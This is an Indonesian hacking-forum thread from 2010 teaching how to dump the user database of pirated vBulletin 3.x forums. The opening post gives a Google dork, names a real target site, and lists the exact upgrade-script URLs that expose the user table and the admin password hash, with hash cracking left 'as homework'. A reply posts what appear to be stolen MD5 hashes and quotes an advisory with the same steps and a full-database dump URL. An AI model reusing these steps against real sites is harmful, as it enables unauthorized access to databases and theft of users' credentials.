Page 1 of 2

[Bug Nulled by NiGHTNiNG] - Eksploitasi Database VBulletin

Posted: Sun Jun 13, 2010 9:05 am
by poni
Vbulletin siapa yang ga kenal? Forum board yang sangat populer dan digunakan oleh forum2 besar di tanah air seperti kaskus, chip.co.id, bluefame(sekarang mereka sudah beralih ke ipboard) dan masih banyak lagi.

Pada vBulletin versi 3.6.x Nulled by NiGHTNiNG bisa dieksploitasi dengan beberapa baris script. Baiklah mari kita coba praktek langsung.

Google Dork :

Code: Select all

Powered by vBulletin || Nulled by NiGHTNiNG
sebagai contohnya kita coba di http://ex-ukm.com

Image
di browser masuk ke path install web tersebut :

Code: Select all

http://ex-ukm.com/install/upgrade_300.php?
Image
Untuk mengetahui table user database tersebut masuk ke

Code: Select all

http://ex-ukm.com/install/upgrade_300.php?step=1
kita bisa lihat table user bernama vbuser

Image
lalu lakukan langkah berikut

Code: Select all

http://ex-ukm.com/install/upgrade_300.php?step=2
Image
Setelah itu Dump tabel user pada databasenya

Code: Select all

http://ex-ukm.com/install/upgrade_301.php?step=backup&do=sqltable&table=vbuser
buka dengan notepad hasil dump tersebut. dan anda bisa menemukan user admin serta password yang dienkripsi (PR anda untuk memecahkan hash tersebut).

Don`t be Evil

Re: [Bug Nulled by NiGHTNiNG] - Eksploitasi Database VBullet

Posted: Sun Jun 13, 2010 9:31 am
by RJ-45
haduh...
Q ru newbie, mau nyoba malah bingung sendiri....!
:circle:
:mati:

Re: [Bug Nulled by NiGHTNiNG] - Eksploitasi Database VBullet

Posted: Sun Jun 13, 2010 9:56 am
by RJ-45

Re: [Bug Nulled by NiGHTNiNG] - Eksploitasi Database VBullet

Posted: Sun Jun 13, 2010 10:11 am
by cyber_criminal
keren om poni

Re: [Bug Nulled by NiGHTNiNG] - Eksploitasi Database VBullet

Posted: Sun Jun 13, 2010 11:49 am
by Tool3
:kaca:

keren nih mas poni good joh kang

Re: [Bug Nulled by NiGHTNiNG] - Eksploitasi Database VBullet

Posted: Sun Jun 13, 2010 3:20 pm
by demonbrando
mantap dah abng poni.... :devil :devil

Re: [Bug Nulled by NiGHTNiNG] - Eksploitasi Database VBullet

Posted: Sun Jun 13, 2010 10:01 pm
by shinichi81
Bos poni,kalau pas proses ternyata ada 5 step,apakah ahrus dicek satu2 atau bisa dilewat? terus cara dump-nya apakah setelah kita lewati tahap step terakhir.terima kasih

Re: [Bug Nulled by NiGHTNiNG] - Eksploitasi Database VBullet

Posted: Mon Jun 14, 2010 6:13 pm
by Darkzzzz
md5?lm?
Huufth... Susah ah bang pon >.<
d78e6f07891bd7c2739f78770d97508a
13c6516c95d3f27263b2056efbc66852
google.com wrote: Date: 06. October 2008
Location: Estonia, Tartu
Web: http://www.waraxe.us/advisory-67.html

Target software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
vBulletin 3.x pirated ("nulled") versions can be found in use in many websites.
Example GoogleDork: "Nulled by NiGHTNiNG"

Vulnerabilities discovered
===============================================================================
vBulletin official installation guide states:
"You should delete the install.php and upgrade*.php files now as a security precaution."
Still, there are lot's of vBulletin-based websites with accessible update scripts.
Let's try this:

http://********.com/install/upgrade_300.php
"Please Enter Your Customer Number" --> no easy way in, seems safe :)
Now - what about "nulled" (pirated) vBulletin installations? It's amazingly huge
community of nulled vBulletin users on Internet. Nulling - it means, that licence
validation is crippled and usually customer number checking is completely removed!
So anyone can access upgrade scripts without any authentication! This is possible,
if upgrade files are not deleted and there is no additional access limiting methods
implemented (like ".htaccess").

Let's find some pirated vBulletin installation and try this same request:
http://********.com/install/upgrade_300.php
-----------------------------------------------------------------------------
Your vBulletin version does not appear to match with the version for which this
script was created (version 3.0.0 Release Candidate 4).

Please ensure that you are attempting to run the correct script.
If you are sure this is the script you would like to run, click here.
-----------------------------------------------------------------------------

Oops ... what now? Let's try this:
http://********.com/install/upgrade_300.php?step=1

-----------------------------------------------------------------------------
Step 1) Fix Some Table Errors (Step 1 of 2)
Database error in vBulletin 3.0.0:
Invalid SQL:
ALTER TABLE vb_user ADD birthday_search DATE NOT NULL DEFAULT '0000-00-00';
MySQL Error : Duplicate column name 'birthday_search'
-----------------------------------------------------------------------------
Cool, now we know table prexix! What next?

http://********.com/install/upgrade_300.php?step=2
-----------------------------------------------------------------------------
Step 2) Upgrade to vBulletin 3.0.0 Complete!
* Updating Version Number to 3.0.0... done
-----------------------------------------------------------------------------

And finally - how about users table dump? Try this:

http://********.com/install/upgrade_301.php?step=backup&do=sqltable&table=vb_user
Or maybe full database dump? Why not, here it is:
http://********.com/install/upgrade_301.php?step=backup&do=sqltable
-----------------------------------------------------------------------------
Opening vb_user.sql --> download prompt
-----------------------------------------------------------------------------
Mission complete! Pirates pwned :)

How to fix:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Buy legal vBulletin licence. Or at least delete install directory.
Ternyata barang bajakan (BB) itu berbahaya yach gan :omg:

Re: [Bug Nulled by NiGHTNiNG] - Eksploitasi Database VBullet

Posted: Mon Jun 14, 2010 9:12 pm
by d1kz
cara ngdump nya gmana kk, biar dpt lin ky gni http://ex-ukm.com/install/upgrade_301.p ... ble=vbuser ..???? :kaca: :kaca: :kaca:

Re: [Bug Nulled by NiGHTNiNG] - Eksploitasi Database VBullet

Posted: Tue Jun 15, 2010 2:17 pm
by shinichi81
d1kz wrote:cara ngdump nya gmana kk, biar dpt lin ky gni http://ex-ukm.com/install/upgrade_301.p ... ble=vbuser ..???? :kaca: :kaca: :kaca:

kalau cara nge-dumpnya otomatis bos.....cuman sekarang ini banyak yang sudah di patch...